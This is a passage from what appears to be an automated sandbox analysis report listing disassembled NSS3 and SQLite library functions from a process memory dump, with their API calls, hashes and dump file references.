                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: af7c2316c3ee55d2d1559e91796230fb5a9e4525cac7cfe1339b6c8d0a67fed8
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A751CD71A04212DFEB30DE29DD88F9B77E5EF94209F15042CE85997710EB31E8158BE2
                                                                                                                                                                                                                                                      Function 6C477CC0 Relevance: 13.6, APIs: 9, Instructions: 132threadCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 6C4740D0: SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,6C473F7F,?,00000055,?,?,6C471666,?,?), ref: 6C4740D9
                                                                                                                                                                                                                                                        • Part of subcall function 6C4740D0: SECITEM_CompareItem_Util.NSS3(00000000,?,?,?,6C471666,?,?), ref: 6C4740FC
                                                                                                                                                                                                                                                        • Part of subcall function 6C4740D0: PR_SetError.NSS3(FFFFE023,00000000,?,?,6C471666,?,?), ref: 6C474138
                                                                                                                                                                                                                                                      • PR_GetCurrentThread.NSS3 ref: 6C477CFD
                                                                                                                                                                                                                                                        • Part of subcall function 6C539BF0: TlsGetValue.KERNEL32(?,?,?,6C580A75), ref: 6C539C07
                                                                                                                                                                                                                                                      • SECITEM_ItemsAreEqual_Util.NSS3(?,6C599030), ref: 6C477D1B
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CFD30: memcmp.VCRUNTIME140(?,AF840FC0,8B000000,?,6C471A3E,00000048,00000054), ref: 6C4CFD56
                                                                                                                                                                                                                                                      • SECITEM_ItemsAreEqual_Util.NSS3(?,6C599048), ref: 6C477D2F
                                                                                                                                                                                                                                                      • SECITEM_CopyItem_Util.NSS3(00000000,?,00000000), ref: 6C477D50
                                                                                                                                                                                                                                                      • PR_GetCurrentThread.NSS3 ref: 6C477D61
                                                                                                                                                                                                                                                      • PORT_ArenaMark_Util.NSS3(?), ref: 6C477D7D
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C477D9C
                                                                                                                                                                                                                                                      • CERT_CheckNameSpace.NSS3(?,00000000,00000000), ref: 6C477DB8
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE023,00000000), ref: 6C477E19
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Util$CurrentEqual_ErrorItem_ItemsThread$ArenaCheckCompareCopyFindMark_NameSpaceTag_Valuefreememcmp
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 70581797-0
                                                                                                                                                                                                                                                      • Opcode ID: 78b61701848ebc833fec4ac39f48eb2b5065354f29128f8a6c5f5434c849bd51
                                                                                                                                                                                                                                                      • Instruction ID: 01b22feebc8c20d636def9af56bb492de22723d514110722c13da409644a13c4
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 78b61701848ebc833fec4ac39f48eb2b5065354f29128f8a6c5f5434c849bd51
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7D41E372A0411A9BEB21DE699D41FEF37A8EF4035DF450128EC19A7B50E730ED1986F1
                                                                                                                                                                                                                                                      Function 6C487EB0 Relevance: 13.6, APIs: 9, Instructions: 124threadCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • free.MOZGLUE(?,00000000,00000000,?,?,?,6C4880DD), ref: 6C487F15
                                                                                                                                                                                                                                                      • DeleteCriticalSection.KERNEL32(?,00000000,00000000,?,?,?,6C4880DD), ref: 6C487F36
                                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,6C4880DD), ref: 6C487F3D
                                                                                                                                                                                                                                                      • SECOID_Shutdown.NSS3(00000000,00000000,?,?,?,6C4880DD), ref: 6C487F5D
                                                                                                                                                                                                                                                      • DeleteCriticalSection.KERNEL32(?,6C4880DD), ref: 6C487F94
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C487F9B
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE08B,00000000,6C4880DD), ref: 6C487FD0
                                                                                                                                                                                                                                                      • PR_SetThreadPrivate.NSS3(FFFFFFFF,00000000,6C4880DD), ref: 6C487FE6
                                                                                                                                                                                                                                                      • free.MOZGLUE(?,6C4880DD), ref: 6C48802D
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: free$CriticalDeleteSection$ErrorPrivateShutdownThread
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 4037168058-0
                                                                                                                                                                                                                                                      • Opcode ID: ef1164c65a63d3e463b076d3b8f1b757ad7fed1d5bac34f5cd6479de38475e70
                                                                                                                                                                                                                                                      • Instruction ID: df2b79ba8323f52a9fabf6919091cdd86510612b7c25b9f323a5c58b2771ada3
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ef1164c65a63d3e463b076d3b8f1b757ad7fed1d5bac34f5cd6479de38475e70
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5441A371B062108BDB10DFF98C88E4A37B5AB47359F16822DEA1587B40D731F805CBAD
                                                                                                                                                                                                                                                      Function 6C4CFEE0 Relevance: 13.6, APIs: 9, Instructions: 120memoryCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C4CFF00
                                                                                                                                                                                                                                                        • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
                                                                                                                                                                                                                                                      • PORT_ArenaMark_Util.NSS3(?), ref: 6C4CFF18
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6C4CFF26
                                                                                                                                                                                                                                                      • PORT_ArenaMark_Util.NSS3(?), ref: 6C4CFF4F
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C4CFF7A
                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C4CFF8C
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ArenaUtil$Alloc_Mark_$ErrorValuememset
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1233137751-0
                                                                                                                                                                                                                                                      • Opcode ID: bde2fe0cdc6b7becb0cde46117056ac7bc02c8aff8b5ec38d2e214a0fc7be88c
                                                                                                                                                                                                                                                      • Instruction ID: 915c4b188bf93ae77699ebb433169b9724c48e6b517f2bda1047e52a7cdd36fd
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bde2fe0cdc6b7becb0cde46117056ac7bc02c8aff8b5ec38d2e214a0fc7be88c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 933153BAA023129BFB10DE599C40F5A76F8EF46349F12013AED1887B50EB34E904C3D2
                                                                                                                                                                                                                                                      Function 6C417D70 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 179COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C417E27
                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C417E67
                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001065F,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000003,?,?), ref: 6C417EED
                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001066C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C417F2E
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _byteswap_ulongsqlite3_log
                                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                      • API String ID: 912837312-598938438
                                                                                                                                                                                                                                                      • Opcode ID: 1de06aca462f1cf3f041b998b0925f82680998f48ccdf20218dd5c382ac6f931
                                                                                                                                                                                                                                                      • Instruction ID: c63e1a464e727407290dd1ce4687d38c3c8642baef02a4bbffa377e7947bfc65
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1de06aca462f1cf3f041b998b0925f82680998f48ccdf20218dd5c382ac6f931
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DA619D74A083059FDB05CF29C890FAA37A2BF85308F1549A8EC495BB52D735EC56CBA1
                                                                                                                                                                                                                                                      Function 6C3FFCF0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 155COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000124AC,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C3FFD7A
                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C3FFD94
                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000124BF,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C3FFE3C
                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C3FFE83
                                                                                                                                                                                                                                                        • Part of subcall function 6C3FFEC0: memcmp.VCRUNTIME140(?,?,?,?,00000000,?), ref: 6C3FFEFA
                                                                                                                                                                                                                                                        • Part of subcall function 6C3FFEC0: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00000000,?), ref: 6C3FFF3B
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _byteswap_ulongsqlite3_log$memcmpmemcpy
                                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                      • API String ID: 1169254434-598938438
                                                                                                                                                                                                                                                      • Opcode ID: 9d131cabae4c862a37363f865ae17fe912a0eddb7f042d942617ca6e01b0000d
                                                                                                                                                                                                                                                      • Instruction ID: 32202e36743641ba54e7a928aad86044cf82871de84ca93be2fa03955e78bc19
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9d131cabae4c862a37363f865ae17fe912a0eddb7f042d942617ca6e01b0000d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F4517E71A002059FDB04CFA9C890AAEBBF5AF4C308F144469EE15AB756E735EC41CFA1
                                                                                                                                                                                                                                                      Function 6C542F70 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 123stringCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C542FFD
                                                                                                                                                                                                                                                      • sqlite3_initialize.NSS3 ref: 6C543007
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C543032
                                                                                                                                                                                                                                                      • sqlite3_mprintf.NSS3(6C5AAAF9,?), ref: 6C543073
                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(?), ref: 6C5430B3
                                                                                                                                                                                                                                                      • sqlite3_mprintf.NSS3(sqlite3_get_table() called with two or more incompatible queries), ref: 6C5430C0
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • sqlite3_get_table() called with two or more incompatible queries, xrefs: 6C5430BB
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: sqlite3_mprintf$memcpysqlite3_freesqlite3_initializestrlen
                                                                                                                                                                                                                                                      • String ID: sqlite3_get_table() called with two or more incompatible queries
                                                                                                                                                                                                                                                      • API String ID: 750880481-4279182443
                                                                                                                                                                                                                                                      • Opcode ID: 6bde412d4f48ca4098a6d72fa44dd9f51b55dfa4375a76f5efeb2ce152ac549e
                                                                                                                                                                                                                                                      • Instruction ID: bd296f57ce112e3525189afcaa8693ba3d074847843b2dd63638abca983b1b04
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6bde412d4f48ca4098a6d72fa44dd9f51b55dfa4375a76f5efeb2ce152ac549e
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6F41BE71600606ABDB10CF25DC80A8AB7B5FF94369F14CA28EC698BB50E731F955CBD1
                                                                                                                                                                                                                                                      Function 6C4C5ED0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 80stringCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(q]Ll), ref: 6C4C5F0A
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C4C5F1F
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(89000904), ref: 6C4C5F2F
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(890008E8), ref: 6C4C5F55
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(00000000,00000000), ref: 6C4C5F6D
                                                                                                                                                                                                                                                      • SECMOD_UpdateSlotList.NSS3(8B4274C0), ref: 6C4C5F7D
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C5220: TlsGetValue.KERNEL32(00000000,890008E8,?,6C4C5F82,8B4274C0), ref: 6C4C5248
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C5220: EnterCriticalSection.KERNEL32(0F6C590D,?,6C4C5F82,8B4274C0), ref: 6C4C525C
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C5220: PR_SetError.NSS3(00000000,00000000), ref: 6C4C528E
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C5220: PR_Unlock.NSS3(0F6C58F1), ref: 6C4C5299
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C5220: free.MOZGLUE(00000000), ref: 6C4C52A9
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalEnterErrorSectionUnlockValue$ListSlotUpdatefreestrlen
                                                                                                                                                                                                                                                      • String ID: q]Ll
                                                                                                                                                                                                                                                      • API String ID: 3150690610-2389411964
                                                                                                                                                                                                                                                      • Opcode ID: 9098cf7d60571c0381959237c82e69a9088f20df36ade76c725f6e0b0e8c8590
                                                                                                                                                                                                                                                      • Instruction ID: e4d1f074e7704d1cf2365ad76fd5034e038640adcbaffb25e16ebf834c85eb66
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9098cf7d60571c0381959237c82e69a9088f20df36ade76c725f6e0b0e8c8590
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BF21E4B5E002149BDB00EF64EC41FEEB7B4EF49318F540029E80AA7710E731A904CBD1
                                                                                                                                                                                                                                                      Function 6C488CF0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 76COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(00000000,00000000,?,6C49124D,00000001), ref: 6C488D19
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,6C49124D,00000001), ref: 6C488D32
                                                                                                                                                                                                                                                      • PL_ArenaRelease.NSS3(?,?,?,?,?,6C49124D,00000001), ref: 6C488D73
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,?,6C49124D,00000001), ref: 6C488D8C
                                                                                                                                                                                                                                                        • Part of subcall function 6C51DD70: TlsGetValue.KERNEL32 ref: 6C51DD8C
                                                                                                                                                                                                                                                        • Part of subcall function 6C51DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C51DDB4
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,?,6C49124D,00000001), ref: 6C488DBA
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalSectionUnlockValue$ArenaEnterLeaveRelease
                                                                                                                                                                                                                                                      • String ID: KRAM$KRAM
                                                                                                                                                                                                                                                      • API String ID: 2419422920-169145855
                                                                                                                                                                                                                                                      • Opcode ID: 6695d7dbdec31c978f98760feba9799d9a3f20475f8ca6c43043d5d48a1794de
                                                                                                                                                                                                                                                      • Instruction ID: 0815e0f8eebf7ee43174b1a6fca95840e92f85d1ed8964273777b8df50d1f5e1
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6695d7dbdec31c978f98760feba9799d9a3f20475f8ca6c43043d5d48a1794de
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4321A1B5A05601CFDB40EF38C884D5AB7F0FF95319F15896AD8998B701D730E882CB91
                                                                                                                                                                                                                                                      Function 6C580ED0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 68COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6C580EE6
                                                                                                                                                                                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6C580EFA
                                                                                                                                                                                                                                                        • Part of subcall function 6C46AEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6C46AF0E
                                                                                                                                                                                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C580F16
                                                                                                                                                                                                                                                      • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C580F1C
                                                                                                                                                                                                                                                      • DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C580F25
                                                                                                                                                                                                                                                      • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C580F2B
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
